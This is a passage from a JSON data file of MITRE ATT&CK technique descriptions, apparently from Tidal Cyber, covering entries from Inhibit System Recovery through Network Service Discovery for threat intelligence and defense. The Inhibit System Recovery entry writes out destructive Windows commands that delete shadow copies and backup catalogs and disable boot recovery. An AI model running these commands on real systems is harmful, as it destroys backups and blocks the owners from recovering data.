            "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3).<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> Furthermore, adversaries may disable recovery notifications, then corrupt backups.<sup>[[disable_notif_synology_ransom](https://app.tidalcyber.com/references/d53e8f89-df78-565b-a316-cf2644c5ed36)]</sup>\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>\n* [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>\n* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>\n* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - <code>diskshadow delete shadows all</code> <sup>[[Diskshadow](https://app.tidalcyber.com/references/9e8b57a5-7e31-5add-ac3e-8b9c0f7f27aa)]</sup> <sup>[[Crytox Ransomware](https://app.tidalcyber.com/references/7c22d9d0-a2d8-5936-a6b1-5c696a2a19c6)]</sup>\n\nOn network devices, adversaries may leverage [Disk Wipe](https://app.tidalcyber.com/technique/ea2b3980-05fd-41a3-8ab9-3106e833c821) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.<sup>[[ZDNet Ransomware Backups 2020](https://app.tidalcyber.com/references/301da9c8-60de-58f0-989f-6b504e3457a3)]</sup> In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.<sup>[[Dark Reading Code Spaces Cyber Attack](https://app.tidalcyber.com/references/e5a3028a-f4cc-537c-9ddd-769792ab33be)]</sup><sup>[[Rhino Security Labs AWS S3 Ransomware](https://app.tidalcyber.com/references/785c6b11-c5f0-5cb4-931b-cf75fcc368a1)]</sup>",
            "meta": {
                "platforms": [
                    "Containers",
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Network",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
                    "type": "uses"
                }
            ],
            "uuid": "d207c03b-fbe7-420e-a053-339f4650c043",
            "value": "Inhibit System Recovery"
        },
        {
"description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://app.tidalcyber.com/technique/34674b83-86a7-4ad9-8b05-49b505aa5ef0)).",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Network",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
                    "type": "uses"
                },
                {
                    "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
                    "type": "uses"
                }
            ],
            "uuid": "5ee96331-a7b7-4c32-a8f1-3fb164078f5f",
            "value": "Input Capture"
        },
        {
            "description": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is a multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1).<sup>[[Trend Micro - Int SP](https://app.tidalcyber.com/references/1c21c911-11db-560c-b623-5937dc478b74)]</sup>\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) or [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.<sup>[[Int SP - chat apps](https://app.tidalcyber.com/references/8d0db0f2-9b29-5216-8c9c-de8bf0c541de)]</sup>",
            "meta": {
                "platforms": [
                    "Google Workspace",
                    "Linux",
                    "macOS",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
                    "type": "uses"
                }
            ],
            "uuid": "4f4ea659-7653-4bfd-a525-b2af32c5899b",
            "value": "Internal Spearphishing"
        },
        {
            "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occur when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exist in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) or [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66). Linux environments support several different IPC mechanisms, two of which are sockets and pipes.<sup>[[Linux IPC](https://app.tidalcyber.com/references/05293061-ce09-49b5-916a-bb7353acfdfa)]</sup> Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) to facilitate remote IPC execution.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
                    "type": "uses"
                }
            ],
            "uuid": "afa4e2b5-cdd8-4d54-bcdb-acee8b5649e4",
            "value": "Inter-Process Communication"
        },
        {
"description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2).<sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). In some cases, adversaries may be able to leverage [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
                    "type": "uses"
                }
            ],
            "uuid": "3dea57fc-3131-408b-a1fd-ff2eea1d858f",
            "value": "Lateral Tool Transfer"
        },
        {
"description": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3)), security or vulnerable software ([Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602)), or hosts within a compromised network ([Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f)).\n\nHost binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) on Windows to access and/or export security event information.<sup>[[WithSecure Lazarus-NoPineapple Threat Intel Report 2023](https://app.tidalcyber.com/references/195922fa-a843-5cd3-a153-32f0b960dcb9)]</sup><sup>[[Cadet Blizzard emerges as novel threat actor](https://app.tidalcyber.com/references/7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b)]</sup> In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup>\n\nAdversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.",
            "meta": {
                "platforms": [
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
                    "type": "uses"
                }
            ],
            "uuid": "309c7c8b-c366-5762-8611-136971ac4eb4",
            "value": "Log Enumeration"
        },
        {
"description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd).<sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup>",
            "meta": {
                "platforms": [
                    "Containers",
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "a0adacc1-8d2a-4e0b-92c1-3766264df4fd",
            "value": "Masquerading"
        },
        {
"description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce",
"value": "Modify Authentication Process"
},
{
"description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "46c78b63-d079-441e-abdd-c16b39d4bab3",
"value": "Modify Cloud Compute Infrastructure"
},
{
"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) may be used for local or remote Registry modification. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup> Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) or other utilities using the Win32 API. <sup>[[Microsoft Reghide NOV 2006](https://app.tidalcyber.com/references/42503ec7-f5da-4116-a3b3-a1b18a66eed3)]</sup> Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. <sup>[[TrendMicro POWELIKS AUG 2014](https://app.tidalcyber.com/references/4a42df15-4d09-4f4f-8333-2b41356fdb80)]</sup> <sup>[[SpectorOps Hiding Reg Jul 2017](https://app.tidalcyber.com/references/877a5ae4-ec5f-4f53-b69d-ba74ff9e1619)]</sup>\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. <sup>[[Microsoft Remote](https://app.tidalcyber.com/references/331d59e3-ce7f-483c-b77d-001c8a9ae1df)]</sup> Often [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) for RPC communication.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "0dfeab84-3c42-4b56-9021-70fe5be4092b",
"value": "Modify Registry"
},
{
"description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f435a5ff-78d2-44de-b464-2b5528f94adc",
"value": "Modify System Image"
},
{
"description": "Adversaries may target multi-factor authentication (MFA) mechanisms (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. <sup>[[Mandiant M Trends 2011](https://app.tidalcyber.com/references/563be052-29ac-4625-927d-84e475ef848e)]</sup>\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). <sup>[[GCN RSA June 2011](https://app.tidalcyber.com/references/40564d23-b9ae-4bb3-8dd1-d6b01163a32d)]</sup>\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "600d45ec-cb9c-47b8-ae94-326471ebb007",
"value": "Multi-Factor Authentication Interception"
},
{
"description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).<sup>[[Obsidian SSPR Abuse 2023](https://app.tidalcyber.com/references/7f28f770-ef06-5923-b759-b731ceabe08a)]</sup>\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”<sup>[[Russian 2FA Push Annoyance - Cimpanu](https://app.tidalcyber.com/references/ad2b0648-b657-4daa-9510-82375a252fc4)]</sup><sup>[[MFA Fatigue Attacks - PortSwigger](https://app.tidalcyber.com/references/1b7b0f00-71ba-4762-ae81-bce24591cff4)]</sup><sup>[[Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://app.tidalcyber.com/references/f45a0551-8d49-4d40-989f-659416dc25ec)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "c0f2efd4-bfc8-43da-9859-14446fb8f289",
"value": "Multi-Factor Authentication Request Generation"
},
{
"description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1) in case the original first-stage communication path is discovered and blocked.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "e54bdb49-6039-4048-9be6-657a7ff3e071",
"value": "Multi-Stage Channels"
},
{
"description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.<sup>[[NT API Windows](https://app.tidalcyber.com/references/306f7da7-caa2-40bf-a3db-e579c541eeb4)]</sup><sup>[[Linux Kernel API](https://app.tidalcyber.com/references/0a30d54e-187a-43e0-9725-3c80aa1c7619)]</sup> These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directly invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[CyberBit System Calls](https://app.tidalcyber.com/references/c13cf528-2a7d-4a32-aee2-db5db2f30298)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup> For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.<sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup><sup>[[GNU Fork](https://app.tidalcyber.com/references/c46331cb-328a-46e3-89c4-e43fa345d6e8)]</sup> This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.<sup>[[Microsoft Win32](https://app.tidalcyber.com/references/585b9975-3cfb-4485-a9eb-5eea337ebd3c)]</sup><sup>[[LIBC](https://app.tidalcyber.com/references/a3fe6ea5-c443-473a-bb13-b4fd8f4923fd)]</sup><sup>[[GLIBC](https://app.tidalcyber.com/references/75a6a1bf-a5a7-419d-b290-6662aeddb7eb)]</sup>\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.<sup>[[Microsoft NET](https://app.tidalcyber.com/references/b4727044-51bb-43b3-afdb-515bb4bb0f7e)]</sup><sup>[[Apple Core Services](https://app.tidalcyber.com/references/0ef05e47-1305-4715-a677-67f1b55b24a3)]</sup><sup>[[MACOS Cocoa](https://app.tidalcyber.com/references/6ada4c6a-23dc-4469-a3a1-1d3b4935db97)]</sup><sup>[[macOS Foundation](https://app.tidalcyber.com/references/ea194268-0a8f-4494-be09-ef5f679f68fe)]</sup>\n\nAdversaries may use assembly to directly or indirectly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.<sup>[[Redops Syscalls](https://app.tidalcyber.com/references/dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8)]</sup> Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "1120f5ec-ef1b-4596-8d8b-a3979a766560",
"value": "Native API"
},
{
"description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400) or exfiltration of data via [Traffic Duplication](https://app.tidalcyber.com/technique/c2fc2776-e674-46ff-8b8d-ecc90b8b1c26). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://app.tidalcyber.com/technique/8b744bfc-6bfb-45c5-8bb8-5b736ce7e634) to achieve the same goals.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup> In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "091282d8-ef05-487f-93aa-445efaeed71b",
"value": "Network Boundary Bridging"
},
{
"description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nSeveral aspects of Network DoS attacks apply across multiple methods, including IP address spoofing and the use of botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://app.tidalcyber.com/technique/8b0caea0-602e-4117-8322-b125150f5c2a).",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "e6c14a7b-1fb8-4557-83e7-7f5b89717311",
"value": "Network Denial of Service"
},
{
"description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.<sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup> \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.<sup>[[apple doco bonjour description](https://app.tidalcyber.com/references/b8538d67-ab91-41c2-9cc3-a7b00c6b372a)]</sup><sup>[[macOS APT Activity Bradley](https://app.tidalcyber.com/references/7ccda957-b38d-4c3f-a8f5-6cecdcb3f584)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
